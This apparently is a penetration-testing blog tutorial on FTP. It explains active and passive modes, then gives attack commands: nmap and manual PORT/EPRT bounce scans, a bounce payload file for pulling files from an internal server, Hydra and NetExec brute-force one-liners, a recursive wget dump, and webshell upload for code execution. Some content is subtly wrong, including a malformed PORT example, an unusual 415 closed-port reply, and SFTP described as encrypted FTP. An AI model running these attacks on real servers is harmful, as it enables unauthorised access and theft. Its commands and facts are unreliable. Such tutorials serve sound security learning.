Skip to content

Intro to FTP

FTP (File Transfer Protocol) is one of the oldest and most widely used protocols for transferring files between computers. While it provides a simple way to move data, its default configuration lacks security, making it a common target for attackers. In this article, we’ll cover the basics of FTP, its communication modes, essential commands, and common misconfigurations that could be exploited. Whether you're a cybersecurity enthusiast or a penetration tester, understanding FTP is crucial for securing or assessing network environments.

This protocol has a client-server architecture using a server to serve files that can be accessed by N clients. By default, the information is transmitted in plain text, although there is an encrypted version of it called SFTP (Secure File Transfer Protocol).

Although there are implementations with a graphical interface, in this article we will make use of the FTP command line tool, which gives us a lot of flexibility when working with the protocol. In later articles we will explore the main client and server implementations, although in this one we will focus on explaining the basic concepts of the protocol, how to work with it and how to take advantage of some misconfigurations.

Theory

Communication channels

For FTP to work, two communication channels are required, one for sending commands and the other for data.

Connection modes

Active

This is the default connection mode for FTP connections, in which two events occur:

  • A command channel is established in the connection to the server between the server's command port (21 by default) and a port greater than 1023 on the client side (we will refer to this as P).
  • Once the data connection is established, an attempt is made to open a connection from the server's data port (20 by default) to port P+1 on the client.

Note

Active mode may present problems with client firewalls because it attempts to create a direct connection to a client-side port, which may be blocked by certain firewalls.

Passive

This mode arises as a solution to the problem of client firewalls, here the workflow is modified so that both the data connection and the client connection are initiated from the client, we can break it down into two events.

  • A command channel is established on the server connection between the server command port (21 by default) and a port greater than 1023 on the client side (we will refer to this as P).
  • Once the data connection is established a data connection is opened from port P+1 on the client to a port on the server data channel, this process is repeated for each file transfer occupying a different server port on each connection (this can be configured in most server side software) .

Note

Passive mode requires the opening of a range of ports in the firewall, this can generate some security problems if this port opening is not configured correctly.

FTP commands

CWD -> Changes the current directory to the specified one
DELE -> Deletes the specified file
EPRT -> Establish a socket for data connection
LIST -> List the files in the current directory
PASV -> Change mode to passive mode
PWD -> Displays the current directory 
RETR -> Download the specified file

Anonymous login

There is an FTP configuration that allows the use of a login to share files for any user that requires it, in case this configuration is enabled a user could use anonymous as login name and any password to access the server as a user with low privileges, although in certain cases this can lead to compromise the entire system.

FTP Bounce port scan

It is possible to abuse the PORT and ERPT commands to perform an open port scan via an FTP server.

Nmap

nmap -b <name>:<pass>@<ftp_server> <victim>

Hand-made

Once connected we can perform the port scan using the PORT and ERPT commands followed by a LIST command.

Here is an example for scanning port 9091 on host 10.10.10.14

PORT 10.10.10.14.14.0.9091
EPRT |2|10.10.10.14|9091||

LIST

If the response is a 150 the port is open, in case of receiving a 415 the port is closed.

FTP Bounce file get

This attack allows an attacker to download files from an FTP server not accessible by the attacker, but which can be reached by an FTP server accessible by the attacker.

Net Diagram
Net Diagram

This attack has the following prerequisites:

  • Valid credentials for External FTP.
  • Valid credentials for Internal FTP.
  • Write access for External FTP.
  • PORT command execution permissions on both External and Internal.

First of all we will deploy an FTP server on the attacker's machine, this server has to support passive mode.

Once deployed we will open a passive connection with the PASV command and tell it to save it with STOR output.ext .

Now we will create a file with the commands we want to launch against the second server, an example would be the following:

user ftp # User for the internal server
pass password # Password for the internal server
cwd /DIRECTORY
type i
port F,F,F,F,F,F,X,X #Our passive port
retr file.ext
quit
^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@
^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@^@ ... ^@^@^@^@

Now we upload it with PUT and from the external server we execute the following commands:

put payload
quote "port C,C,C,C,C,0,21" # IP of internal server
quote "retr payload"

After this we will have the file.ext file on our server as output.ext

Brute force attack

Many FTP servers do not have protection against brute force attacks. Having a user or a list of them we can carry out a brute force attack with different credentials obtained from various sources, although there are several tools for this purpose, the two most common are NetExec and Hydra.

NetExec

nxc ftp IP -u userfile -p passwordfile

Hydra

hydra -L userfile -P passwordfile ftp://IP

Full content backup

This is not an attack per se, but it is quite useful, as it allows us to download all accessible files from the server using a single command.

wget -r ftp://IP/dir/* --ftp-user=username --ftp-password=password

FTP file upload to RCE

In certain circumstances, permission to upload files to the server along with other misconfigurations can lead to obtaining remote execution of commands on the server.

The most common case is the possibility of uploading files to be served by a web server, where we could upload a webshell interpretable by the server to obtain command execution.

Sniffing credentials

Since FTP works by default in plain text, it is possible for an attacker on the same network to use a sniffer and capture both the credentials and the FTP conversation.

In the next article of this series on FTP we will discuss common implementation errors and some known vulnerabilities of some implementations of the protocol.

Stay safe. Stay smart. Stay secure.